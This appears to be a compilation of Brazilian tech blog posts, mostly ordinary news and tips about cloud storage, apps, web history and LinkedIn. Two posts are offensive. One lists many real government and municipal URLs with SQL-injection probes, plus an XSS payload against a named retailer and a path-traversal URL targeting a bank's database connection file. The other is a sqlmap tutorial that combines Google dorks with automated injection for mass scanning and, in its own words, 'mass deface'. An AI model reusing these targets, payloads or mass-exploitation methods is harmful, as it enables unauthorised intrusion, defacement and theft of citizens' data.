value1

Google corta preços de armazenamento extra no Google Drive

O Google anunciou nesta quinta-feira, 13, uma nova estratégia agressiva de preços para o Google Drive, seu serviço de armazenamento de arquivos em nuvem. A empresa cortou radicalmente os valores, permitindo que os usuários paguem US$ 2 por mês por 100 GB de armazenamento, ou US$ 10 mensais para 1 TB de espaço online.

Antes, a opção de 100 GB custava US$ 5, enquanto a alternativa de 1 TB caiu de forma vertiginosa, já que custava US$ 50. A empresa continua oferecendo 15 GB gratuitos no serviço para quem  não precisa de mais espaço, ou para quem não quer gastar a mais com isso.

O corte de preço é agressivo e coloca muita pressão sobre os concorrentes na área, como o OneDrive, da Microsoft, e o Dropbox.

No caso do Dropbox, há muitas limitações no plano gratuito; já o plano pago mais simples custa US$ 10 ao mês por apenas 100 GB de armazenamento. O OneDrive, por sua vez, se sai um pouco melhor, com o mesmo plano de 100 GB custando apenas US$ 7,50 mensais, mas ainda não chega perto dos US$ 2 do Google.

As mudanças de preço do Google Drive passam a valer imediatamente. Para conferir todos os planos, basta clicar aqui.

fonte: http://olhardigital.uol.com.br/

value1

GVT lança app que transfere ligações do fixo para smartphone

A  GVT anuncia hoje o aplicativo "GVT Freedom", que permite aos clientes da operadora realizar e receber ligações da linha fixa diretamente nos smartphones conectados à internet. Temporariamente gratuito, o serviço está disponível para Android e iPhones.

As chamadas não são gratuitas e dependem da qualidade da conexão. A plataforma foi criada para que as pessoas utilizem a franquia de minutos mensal da linha fixa quando não estão no endereço onde ela está fisicamente instalada.

“Com o tempo, as pessoas vão perceber a vantagem de ter a 'extensão' da linha fixa disponível em qualquer ponto com internet e acessar o número fixo remotamente passará a ser um hábito”, analisa o vice-presidente de marketing e vendas da GVT, Daniel Neiva. 

De acordo com dados da última Pesquisa Nacional por Amostras de Domicílios (Pnad) do IBGE, 51,4% dos domicílios brasileiros já não têm telefone fixo e a receita das operadoras neste segmento de negócio está caindo em média 5% ao ano, segundo relatórios da consultoria Frost&Sullivan.

fonte: http://olhardigital.uol.com.br/

value1

CURSO GRÁTIS DE HTML E CSS – COMO CRIAR SITES

Já parou para pensar como são feitos os sites?

Quem os cria? Quanto ganham? Ondetrabalham?

O que é preciso estudar, que ferramentas usar?

Por onde começar?

 

Uma coisa é certa: é um ramo extremamente promissor e crescente.

A tecnologia está tão presente em nossas vidas, e em todas as classes sociais, que é até redundante falar da importância dos sites.

Toda empresa ou loja, obrigatoriamente, tem um site.

Aliás, algumas lojas existem somente na internet, são os chamados e-commerce ou lojas virtuais.

Restaurantes, pizzarias e lanchonetes, já lançam seu cardápio e fazem atendimento pela internet.

Não é exagero algum dizer que qualquer estabelecimento comercial, até os de pequeno porte, como um mercadinho da esquina, estão na internet.

É possível achar, com facilidade, site de empresas dos mais variados tipos de serviços.

E, obviamente, quem se beneficia disso é quem trabalha na criação de sites, um tipo de profissional que pode trabalhar tanto em agências, para empresas ou em casa, por conta própria, são os webmasters.

CURSO GRÁTIS DE HTML E CSS – COMO CRIAR SITES

Para trabalhar nesse ramo, basicamente você pode ser webmaster (criar sites), trabalhar com a parte de arte digital (webdesign) ou ser programador.

Há diversos caminhos para se seguir e coisas para estudar, mas duas coisas são essenciais para se trabalhar nesse ramo, por onde você deve obrigatoriamente começar: a linguagem de marcação HTML e a linguagem de estilo CSS.

E tanto HTML como CSS você pode aprender no Curso HTML Progressivo, que é um projeto que visa ensinar essas linguagens, de maneira bem simples, voltada para iniciantes, totalmente gratuita e online, não sendo nem necessário fazer cadastro para começar seus estudos.

Se for iniciante nesse ramo, basta clicar no Índice e seguir os tutoriais na ordem indicada.

O projeto é bem dividido em seções, sendo muito usado para referência, para relembrar algum código ou conceito, como a sessão com o Curso de CSS ou o Tutorial de HTML5.

O curso se inicia pelo antigo HTML, o 4.01, ensinando todos conceitos, sem se preocupar com as tags que deixaram de ser usadas, para que o estudante tenha uma base bem sólida em HTML.

Em seguida, é ensinado o CSS, uma ferramenta super poderosa, capaz de estilizar quantas páginas forem necessárias, de maneira bem simples.

Por fim, o curso foca no moderno HTML5, que faz coisas que antes só eram feitas com linguagens de programação, como efeitos gráficos, jogos e as mais modernas aplicações.

No decorrer dos tutoriais de CSS e HTML5, é falado sobre os novos elementos e ferramentas, o que é mais atual e indicado de se usar profissionalmente.

Não perca mais tempo, olhe ao seu redor e o dia-a-dia das pessoas: absolutamente tudo gira em torno de tecnologia e internet.

Acesse o Curso HTML Progressivo, arranje um bom local, inicie seus estudos e comece a criar desde o início diversos sites, com diversos estilos, efeitos e layouts.

O projeto HTML Progressivo faz parte do conceituado site Programação Progressiva, que já lançou diversos cursos na área de Tecnologia, como o Curso de Java, Curso de C e Curso de Assembly, com milhares de aulas e tutoriais acessados todos os dias.

fonte: http://gfcursosgratis.com/

value1

Qual a diferença entre internet e web?

A World Wide Web, conhecida como www ou apenas “web”, completa seus 25 anos nesta quarta-feira, 12. Mas você sabe o que ela é de fato? Não, não é a mesma coisa que a internet.

Muitas vezes por conveniência e contexto, os dois termos acabam se confundindo, porque na maioria das situações a web é quem leva uma pessoa a acessar a internet.

 

A diferença é bastante simples: a internet é uma rede que conecta milhões de computadores pelo mundo, enquanto a web é uma das várias ferramentas de acesso a essa rede. É a internet que provê serviços como e-mail, FTP e troca de mensagens instantâneas.

A web usa o protocolo HTTP para promover essa transferência de informações e depende de browsers (navegadores como Internet Explorer e Chrome) para apresentar tudo isso ao internauta, permitindo que ele clique em links que levam a arquivos hospedados em outros computadores.

fonte: http://olhardigital.uol.com.br/

value1

Vulnerabilidade em grandes sites – Seus dados estão seguros?

Não é difícil hoje em dia fazer a invasão em um determinado site, o lado bom para os administradores é que os crackers ou script-kiddies assim como macacos que pulam de galho em galho, gostam de pular de site em site. A internet está cheia de sites com vulnerabilidade e algumas pessoas fazem questão de publicar tais vulnerabilidades. Estamos em ano de copa e eleição, grandes ataques já foram feitos e estão por vir mesmo sem a divulgação da mídia, aliás, as redes sociais já fazem bem esse trabalho de divulgação.

 

Pensando nisso tudo eu resolvi publicar algumas vulnerabilidades e falso-positivos em grandes sites (e sites pequenos mesmo). Todo o conteúdo desse post eu juntei com amigos, outros blogs e procurando, é bem interessante as pessoas que frequentam sites governamentais e que são administradores lerem essa postagem… Pense bem, seus dados estão totalmente seguros?

Imaginem só um dia vocês checarem a conta de poupança e verem o saldo negativo. Está certo que o banco se responsabiliza em alguns casos, mas… e a dor de cabeça? Quem pagaria a dor de cabeça e horas perdidas em um banco cheio? Pois é, tomem muito cuidado com quem cuida de seus dados, virtualmente eles são seus bens mais preciosos. Eu não digo isso em relação só ao banco, pessoas que trabalham em órgãos públicos ou que tem algum vínculo também sofrem desse problema. Vamos começar pegando leve então, a seguir tem uma lista de sites do governo vulneráveis a um ataque BASTANTE conhecido… SQL Injection:

http://portalsocial.sedsdh.pe.gov.br/sigas/relatorios/PerfilMunicipalParam.rel?codigo=1%27

http://www.camarajuquitiba.com.br/leisdomunicipio/verlei.php?codigo=570%27

http://www.camarapereirabarreto.sp.gov.br/Imprensa/Noticia.aspx?IdNoticia=909%27

http://www.seinf.to.gov.br/Noticias/VisualizarAudio.aspx?id_audio=3%27

http://www.riodooeste.sc.gov.br/legis/?id=galeria/galeria_autoridades/gal_autoridades_unica&codigo=1%27

http://www.ipem.mg.gov.br/content/conteudo/conteudo.asp?codigo=1%27

http://www.inconfidentes.mg.gov.br/turismocidade.php?codigo=1%27

http://www.eavparquelage.rj.gov.br/eavText.asp?sMenu=APOI%27

http://www.cbv.com.br/v1/noticias.asp?IdNot=17096%27

http://www.iac.sp.gov.br/noticiasdetalhes.php?id=748%27

http://www.camaraandradas.mg.gov.br/noticias.php?id=30

http://www.sumare.sp.gov.br/news.php?id=4812%27

http://www.consea.sp.gov.br/noticia.php?id=224%27

http://www.camaracondor.rs.gov.br/site/ver.php?codigo=464%27

http://www.santarosa.rs.gov.br/noticias.php?acao=ver&id=4182%27

http://www.camarabarroso.mg.gov.br/index.php?pg=vereadores%27

http://www.casaruibarbosa.gov.br/interna.php?ID_S=11%27

http://www.novaesperancadosul.rs.gov.br/portal/?pagina=noticia¬iciaID=165%27

http://www.santoantoniodapatrulha.rs.gov.br/prefeitura/index.php?id=27%27

http://www.ribeiraopires.sp.gov.br/interno.php?id=405%27

http://oeiras.pi.gov.br/noticias.php?id=132%27

http://arcoverde.pe.gov.br/webnoticias_ler.php?id=1775%27

http://www.sead.pi.gov.br/album.php?id=205

http://www9.prefeitura.sp.gov.br/secretarias/smads/estouaqui/pessoas/exibir_resolvidos/letters:xz

http://www.crmvsp.gov.br/site/noticia_ver.php?id_noticia=4865

http://www.cprm.gov.br/publique/cgi/cgilua.exe/sys/start.htm?sid=%Inject_Here%93

http://www.saomiguel.rn.gov.br/noticia.php?cod=100%27

http://www.ji-parana.ro.gov.br/layout2013/index2.php?ver_pagina=enderecos%27

http://www.setec.ap.gov.br/det.php?cd=911%27

http://www.iac.sp.gov.br/noticiasdetalhes.php?id=748%27

http://paraibuna.sp.gov.br/noticia.php?Id=662%27

Pequena a lista, não? Esses são sites de prefeituras com o erro mais infeliz que já vi na vida, é claro que outros sites rodam CMS como joomla ou wordpress, aliás… 80% dos sites do governo federal são feitos em joomla.

Sites de compra nem se fale né? Muitos sites dizem ter certificado de blindagem, mas é blindado por uma pessoa, e se essa pessoa falhar? Selos de blindagem só funcionam quando o profissional conhece os dois lados da moeda, ou seja, se ele já foi do “lado negro da força” e tem uma ética impecável hoje em dia. Um exemplo? Pois não:

http://busca.submarino.com.br/busca.php?q=%3Cimg+src%3Dhttp://securityattack.com.br/wp-content/uploads/2014/03/logo.png%3E%3Cscript%3Ealert%28%22XSS%22%29%3Balert%28document.write%29%3C%2Fscript%3E

 

E para finalizar temos uma lista de falhas no site da caixa, imaginem só uma falha no banco de seu coração? O problema é que não é só uma falha, são várias e algumas podem até mesmo alterar seus dados apenas com seu CPF:

https://webp.caixa.gov.br/urbanizacao/popup/pop_frame.asp?item=pr&endereco=../portal/download.asp?file=../dsn/conexaosql.asp

https://webp.caixa.gov.br/urbanizacao/menuservico.asp

https://www.segurancacadastrounico.caixa.gov.br/password.php?key=ot2zz%2FDzVOUB4Mgf9s3VMEOs1tU%3D

É claro que existem outros milhões de sites importantes que não postarei aqui por… “ética”. Essa postagem foi só para mostrar que por onde trafegam seus dados não é tão seguro assim, mesmo com selos e certificados SSL… Vale ressaltar para as pessoas que têm empresas, o administrador de vocês é um profissional competente? O Webmaster que criou o site, fez ele baseado em otimização e segurança?

Cuidado com quem vocês deixam seus sites e dados na mão. Suas informações são seus bens mais preciosos no mundo virtual, com elas qualquer um pode estragar sua vida ou se beneficiar nas suas costas.

Abraços e até mais.

fonte: http://securityattack.com.br/

value1

World Wide Web faz 25 anos e promove a Web We Want

 Há exatamente 25 anos, a World Wide Web deixava de ser um projeto exclusivo para universidades. O físico Tim Berners-Lee terminava o rascunho da proposta de um sistema de compartilhamento de informações, concebido originalmente para melhorar a comunicação entre laboratórios universitários, entregue ao Centro Europeu de Pesquisa Nuclear (Cern), que o tornaria público em 30 de abril de 1993.

Esse documento (ao qual pertence o esquema abaixo) entrou para a história ao colocar a tecnologia por trás da web em domínio público, permitindo o desenvolvimento da plataforma nos anos seguintes.

Quando foi criado, o sistema era conhecido como “Mesh”. A ideia de chamá-lo de “World Wide Web” só surgiu em 1990, quando Berners-Lee estava escrevendo o código da web. Um nome grandioso, sinal da dimensão que o sistema teria, como reflete o atual diretor-geral do Cern, Rolf Heuer.

 

Para comemorar a data, Tim Berners-Lee, o World Wide Web Consortium (W3C) e a Fundação World Wide Web estão lançando uma série de iniciativas com o propósito de reafirmar os princípios da proposta original. Uma dessas iniciativas é a campanha chamada "The web we want" (a Web que queremos), que convida as pessoas a defenderem o seu direito a uma Internet livre, aberta e verdadeiramente global e propõe a criação de uma carta de direitos em cada país –uma afirmação de princípios que, ele espera, será apoiada por instituições públicas, autoridades governamentais e corporações.

"Precisamos de uma constituição global, de uma carta de direitos", explica Berners-Lee, preocupado com os crescentes ataques de governos e empresas  à Internet e à Web. Segundo ele,  novas regras são necessárias para proteger o sistema "aberto e neutro". O pai da Web não quer vê-la, bem como à própria Internet, "balcanizada" por países ou organizações que dividam o espaço digital para trabalhar sob as próprias regras, seja por motivos de censura, regulação ou comércio.

"A Web é universal, aberta, descentralizada e royalty-free", completa ele. Na visão de Berners-Lee, a regulamentação da internet é necessária, mas deveria ser mínima. Segundo ele,  os esforços para controlar conteúdos podem causar impacto em outras áreas como decisões de voto e o desenvolvimento da democracia.

Na visão de  Berners-Lee a Internet está envenenada por um grande pacote de mudanças em seu uso e suas habilidades. Comparada à evolução dos veículos e da televisão, a Internet é um espaço muito mais abstrato com alto potencial de inovação. "Há um grande número de mudanças por vir", disse Berners-Lee. "Se você olhar 25 anos para trás... vai perceber que estamos em um estágio embrionário da Web em muitos pontos de vista".

Hoje, Berners-Lee está envolvido com o desenvolvimento da "Web Semântica", que permite que máquinas inteligentes interpretem dados e façam um roteamento dos mesmos de uma forma intuitiva para os usuários. A Web Semântica incorpora uma linguagem de tagging chamada Resource Description Framework para descrever dados, da mesma forma como o HTML (Hypertext Markup Language) é usado para documentos.

{media load=media,id=320,width=200,align=left,display=inline}

"Os bilhões de usuários da web são o que a fizeram grande. Espero que muitos deles juntem-se a mim hoje para comemorar este importante marco. Eu também espero que este aniversário desencadeie uma conversa mundial sobre a nossa necessidade de defender os princípios que fizeram da web um sucesso. É preciso desbloquear o potencial inexplorado da web. Eu acredito que podemos construir uma web que seja realmente para todos: uma web que seja acessível a todos a partir de qualquer dispositivo e que capacite todos nós a alcançar nossa dignidade, direitos e todo o nosso potencial como seres humanos, diz o pai da Web.

Comemoração
A intenção das entidades, hoje e durante todo este ano, é celebrar os primeiros 25 anos da Web. Muitas outras organizaçãoes aderiram ao chamado de Berners-Lee, criando conteúdo celebrando a data. Entre elas o próprio CERN e também o Pew Research Center, que publica uma série de pesquisas osobre como será o mundo em 2025.

Na opinião do criador da Web, há muito a fazer para que a Web alcance seu pleno potencial.

"Devemos continuar a defender os seus princípios fundamentais e enfrentar alguns desafios importantes. Para citar apenas três: (1) Como podemos conectar os quase dois terços do planeta que ainda não podem acessar a Web? (2) Quem tem o direito de coletar e usar os nossos dados pessoais, para que fins e sob quais regras? (3) Como podemos criar uma arquitetura aberta de alto desempenho que será executada em qualquer dispositivo, em vez de cair em alternativas proprietárias?" - defende o site comemorativo.

As próprias entidades reconhecem que não há respostas fáceis para essas e muitas outras perguntas. Mas lembram a todos nós que a Web foi construída por todos nós, e por isso, devemos fazer tudo o que pudermos para continuarmos desempenhando um papel ativo na definição de seu futuro.

Mais de duas em cada cinco pessoas no mundo, muitas vezes divididas geograficamente e socialmente, estão agora ligadas à web. A cada minuto, elas enviam umas as outras centenas de milhões de mensagens, compartilham 20 milhões de fotos e gastam pelo menos US$ 15 milhões em bens e serviços. O sucesso da web pode ser atribuído ao seu desenho original, como um sistema descentralizado e uma arquitetura aberta que qualquer um poderia ajudar a construir.

No entanto, o verdadeiro potencial da web aberta como uma ferramenta para o empoderamento em todo mundo ainda precisa acontecer, e pode diminuir se os principais desafios não forem resolvidos. Ao longo de 2014 e posteriormente, Berners-Lee buscará engajar os usuários da web, empresas e políticos no debate crítico de questões como:

- Regulamentação da Internet está muito disputada em terreno mundial e nacional. Que novas soluções inclusivas podem evitar os danos de uma web fragmentada?

- A nossa capacidade de usar a web para falar e organizar coletivamente está sob ameaça de censura e vigilância, qualquer usuário online está ameaçado por cibercrimes. Como podemos atender a sociedade a partir das necessidades crescentes de liberdade e privacidade online, bem como de segurança?

- Globalmente, menos de 10% do conjunto de dados chave do governo têm sido abertos gratuitamente para aproveitamento online, limitando drasticamente o empoderamento de inovação da web em áreas como a melhoria do transporte público e a luta contra a corrupção. Que medidas podem ser tomadas para despertar o verdadeiro poder dos dados abertos?

- A Plataforma web aberta deve ser capaz de se expandir para atender a indústria que demanda por interoperabilidade, mobilidade e desempenho em dispositivos conectados de todas as formas e tamanhos. Como vamos enfrentar os desafios colocados por essa diversidade?

- Como vamos promover um rico ecossistema de diversidade e inovação a longo prazo, ao invés de jardins murados menos férteis?

"Se queremos uma web verdadeiramente para todos, então todos devem ter um papel na formação de seus próximos 25 anos", diz Berners-Lee.

Outra iniciativa convida todos os internautas a enviarem uma mensagem de aniversário para a Web usando a hashtag #web25, em qualquer plataforma de mídia social.  "Conte-nos seus sonhos para a web com #Web25", convida Berners-Lee.  As mensagens selecionadas serão publicadas em um cartão virtual de aniversário no site http://www.webat25.org/.

Já deu parabéns para Web hoje?

fonte: http://idgnow.com.br/

value1

Dica: 3 aplicativos Android que colocam as mensagens SMS no seu desktop

Quando você está trabalhando, usa um teclado, mouse e touchpad para maximizar sua produtividade. E aí você recebe uma mensagem SMS no celular, e tem que se curvar para conseguir vê-la na telinha e entortar os dedos para responder no diminuto teclado virtual.

 

Se você está sentado em frente a um bom teclado e um belo monitor, deveria ser capaz de usá-lo para responder mensagens. Vários desenvolvedores tiveram a mesma idéia, e criaram alguns apps fantásticos para Android que lhe dão o poder de enviar e responder mensagens SMS, e muito mais, no PC. Vamos mostrar três deles, do mais simples ao mais poderoso.

Notificações onipresentes

Nem todo mundo precisa responder a uma mensagem SMS imediatamente. Talvez você só precise saber o que está acontecendo, para que possa ignorá-la até mais tarde. Se esse é o seu caso o Pushbullet é o que você procura. O propósito do programa é enviar links, imagens e coordenadas de mapas do PC para o smartphone, e vice-versa, algo que por sí só ajuda a economizar tempo e reduzir frustração. Mas ele também pode ser usado para mostrar as notificações pendentes em seu smartphone.

Instale o Pushbullet em seu smartphone e a extensão para o Chrome ou para o Firefox em seu desktop. O app no smartphone irá pedir para que você habilite os recursos de acessibilidade/administrador para que possa enviar as notificações. Faça isso.

As notificações do Pushbullet aparecem em "cartões" no navegador

A partir daí, sempre que seu smartphone apitar ou vibrar com uma notificação, você irá vê-la em um pop-up em seu navegador. Não só novas mensagens SMS, mas novas mensagens de e-mail, no Facebook, no Twitter, avisos de novas versões de aplicativos… tudo aquilo que gerar uma notificação.

Não dá pra responder diretamente a uma mensagem usando o Pushbullet, mas há um truque. Envie uma nota do PC para o smartphone, abra a nota no smartphone, clique no botão compartilhar (o que se parece com o símbolo < no canto superior direito da tela) e escolha o app Mensagens (ou Hangouts). O texto da nota será colado em uma nova mensagem, é só escolher o destinatário e enviar. Não é algo prático para uma troca rápida de mensagens, mas quebra o galho, especialmente se você precisar digitar uma mensagem mais longa. E o serviço é gratuito.

Transforme mensagens SMS em e-mails, conversas no Google Talk e alertas no navegador

O DeskSMS permite que você receba e responda a mensagens SMS a partir de praticamente qualquer lugar onde possa abrir um navegador ou checar seu e-mail.

Primeiro instale o DeskSMS em seu smartphone, e a extensão no Chrome ou no Firefox. No smartphone, dê ao app permissão para receber e enviar mensagens de texto, faça login com sua conta do Google/GMail e deixe o programa testar a conexão à sua contano Hangouts, e-mail e extensão no navegador.

O DeskSMS faz a "ponte" entre o SMS e serviços como o GMail ou Hangouts

Se tudo estiver certo, você irá receber suas mensagens de texto como conversar no Hangouts, e-mails no GMail ou notificações no navegador, e poderá responder da mesma forma. Se você quiser receber as mensagens do smartphone em um tablet em vez do PC, precisará instalar no tablet o app TabletSMS.

O DeskSMS não é gratuito. Você pode experimentá-lo gratuitamente por 14 dias, e após este período é necessário uma assinatura anual que custa US$ 5.

Controle remoto total

AirDroid permite enviar e responder a mensagens SMS em uma janela do navegador. Instale o app em seu smartphone, acesse web.airdroid.com, digite o código mostrado na tela de seu aparelho e você verá um “desktop” com acesso a várias funções. Basta clicar em Messages para ver seu histórico de mensagens, responder a uma delas ou compor uma nova. 

Mas tem mais. Notou os outros ícones no desktop do AirDroid, como MusicPhotosFiles eApps? Pois então, com eles você pode tocar no PC as músicas que estão armazenadas em seu smartphone, ver as fotos, os arquivos na memória interna, baixar cópias dos apps para o PC e instalar apps novos, tirar screenshots, localizar o aparelho e muito mais.

AirDroid permite controle remoto total do smartphone através do PC

Resumindo, há muito pouco que você não pode fazer com o AirDroid, e ele funciona tanto através da internet (via web.airdroid.com) ou com conexão direta ao aparelho, caso ele e o PC estejam na mesma rede Wi-Fi, o que é mais rápido (especialmente para a transferência de arquivos). O app pode ser usado gratuitamente, mas nesse caso há um limite de 100 MB na transferência de dados (usando o serviço via internet) e anúncios. Uma assinatura Premium custa US$ 1,99 mensais, US$ 19,99 anuais ou US$ 38,99 por dois anos.

Depois de passar um tempo usando qualquer um destes três métodos para receber mensagens SMS em seu computador, você pode começar a pensar que usar o smartphone para isso é um retrocesso. Seus amigos irão se impressionar com a agilidade e eloquência nas respostas, seu chefe não vai te ver com a cara enfiada no smartphone quando deveria estar trabalhando, e você pode até se sentir um pouco mais focado. Quem sabe?

fonte: http://idgnow.com.br

value1

Facilitando pesquisa de vulnerabilidade – Testando vários sites – Sqlmap

Hoje vou colocar o “Blackhat” e trazer esse tutorial compartilhado pelo meu brother Unk (que virou pastor e “saiu” da área ;/). Esse tutorial é meio antigo, mas não custa nada compartilhar com os irmãos.

Nunca vi um tutorial assim, pelo menos não em português, já vi uns de “como burlar firewall”, mas usando técnicas avançadas para exploração com o sqlmap nunca vi.

O fato é que existe um recurso muito interessante para “mass deface” ou para explorar vários sites aleatórios em uma tacada só. O Sqlmap tem a opção de usar dorks do google integrado para já fazer a pesquisa e atacar ao mesmo tempo, facilita na pesquisa, diminui a quantidade de programas que usa para pesquisar e ainda já faz o teste de SqlInjection.

Aqui você pode ver como explorar esse recurso:

./sqlmap.py -g “site:testphp.vulnweb.com” –dbs -v 2

Com essas opções acima vamos ter o resultado das pesquisas + teste de sqlinjection no link + listagem de db’s do site + verbose nvl 2.

Agora você pode implementar essas técnicas com outros parâmetros, a seguir mostro alguns:

./sqlmap.py -g “site:testphp.vulnweb.com” –gpage=3 –dbs -v 2

Isto puxará os resultados da terceira página do Google.

Podemos também usar “inurl:” para procurar . Por exemplo:

$ ./sqlmap -g “inurl:index.php?id=” –dbs -v 2

Este método faz varredura de todas as “index.php?id =” no Google a partir de ordem de listagem na primeira página do Google.

Pode usar no final da linha o comando “–beep” para alertar com um som o site vulnerável, assim pode ir tomar café deixar rodando.

O “–page-rank” para pegar o ranking de páginas dos resultados.

Com esses simples comandos você pode até fazer um “mass deface” testando várias páginas do google.

Como vocês podem ver, o Sqlmap é uma ferramenta MUITO rica assim como nmap e outras que temos no mercado do “pentest”. Espero que tenham gostado do pequeno tutorial, abraços. Não esqueçam de curtir a página e se inscrever no canal do Youtube. :B

fonte: http://securityattack.com.br/

value1

Qual navegador móvel é mais rápido? Veja o teste

Por ser o navegador oficial do iOS, o Safari poderia ser o mais rápido quando usado no iPhone, mas o pessoal da CNET fez um teste e descobriu que a lógica teórica nem sempre se concretiza na prática.

Três repórteres do site usaram Safari, Opera e Chrome em três iPhones de mesmo modelo (o 5s), com a mesma fonte de internet 4G e caches e históricos deletados. Cada um abriu três tipos de páginas: notícias (NYT), imagens (Pinterest) e um mais pesado de mídia (Giant Bomb).

 

No fim, quem se deu melhor foi o Chrome, que abriu a maioria das páginas mais rapidamente que os concorrentes. O Safari até conseguiu brigar, mas o Opera não abriu nenhuma na frente – no primeiro teste eles quase desistiram de esperar o Opera.

Confira no vídeo como tudo foi feito:

fonte: http://olhardigital.uol.com.br/

value1

LinkedIn: 8 erros que não deve cometer

Para você, que se encontra à procura de novas oportunidades profissionais saiba quais os principais erros que não deve cometer na sua conta do LinkedIn.

 

Segundo Nicole Williams, especialista em gestão de carreira no LinkedIn, refere que ao analisar várias contas nesta rede profissional, verificou que existem erros que se repetem em vários perfis e que podem custar ao seu utilizar uma nova oportunidade de carreira.

Primeiro erro: Não colocar fotografia no perfil

Segundo Nicole, o seu perfil no LinkedIn tem 7 vezes mais hipóteses de ser visualizado se tiver associado uma fotografia. É como um anúncio imobiliário: se não tiver nenhuma fotografia, pode-se pensar que alguma coisa está errada.

Segundo erro: Usar uma imagem errada

Pior do que não ter uma fotografia sua associada, é ter uma imagem de um animal de estimação, do seu bébé, ou de um boneco. Reforço a ideia de que a imagem está lá, para mostrar o seu melhor lado profissional e não o pessoal.

Terceiro erro: Status

Atualmente, facilmente se consegue saber a sua vida social. O LinkedIn é o lugar ideal para destacar o seu sucesso profissional. Por isso, tenha cuidado com o que escreve nesta rede profissional sobre a sua vida privada.

Quarto erro: Enviar convites padrão para todos os seus contatos

Não se esqueça que no LinkedIn, você está a tentar construir uma rede profissional, com o intuito de ter acesso a oportunidades de carreira.

Neste caso, ao escolher os seus contatos, priveligie a qualidade em vez da quantidade, pois os possíveis empregadores também vão analisar os seus relacionamentos profissionais.

Quinto erro: Não redefinir as configurações de privacidade

Cuidado! Quando se encontrar à procura de outra oportunidade profissional, não se esqueça de alterar as suas configurações de privacidade de modo a que o seu atual empregador não possa ver que se encontra à procura de novas oportunidades.

Sexto erro: Não preencher o espaço de resumo

Preencher o espaço resumo da sua página no LinkedIn, é uma forma de se vender e destacar a si próprio. Não se enqueça que existem cada vez mais pessoas a concorrer para o mesmo cargo, preencher o resumo pode-lhe dar uma vantagem com o seu possível futuro empregador.

Sétimo erro: Excluir experiência profissional e voluntariado

Você deve listar todas as suas experiências profissionais no LinkedIn, ao contrário do que você faz com o seu CV, que enumera a experiênia profissional em função do cargo a que se candidata. Você não sabe quais os critérios de procura do empregador e, deste modo, tem uma hipótese de se diferenciar dos restantes trabalhadores.

Oitavo erro: Não saber esperar

Muitos utilizadores do LinkedIn esperam que ao efetuar a sua página apareça logo uma proposta irrecusável e, como tal, quando isso não acontece tendem a desmoralizar.

Não perca a esperança, invista com frequência na sua página no LinkedIn e verá o seu esforço recompensado.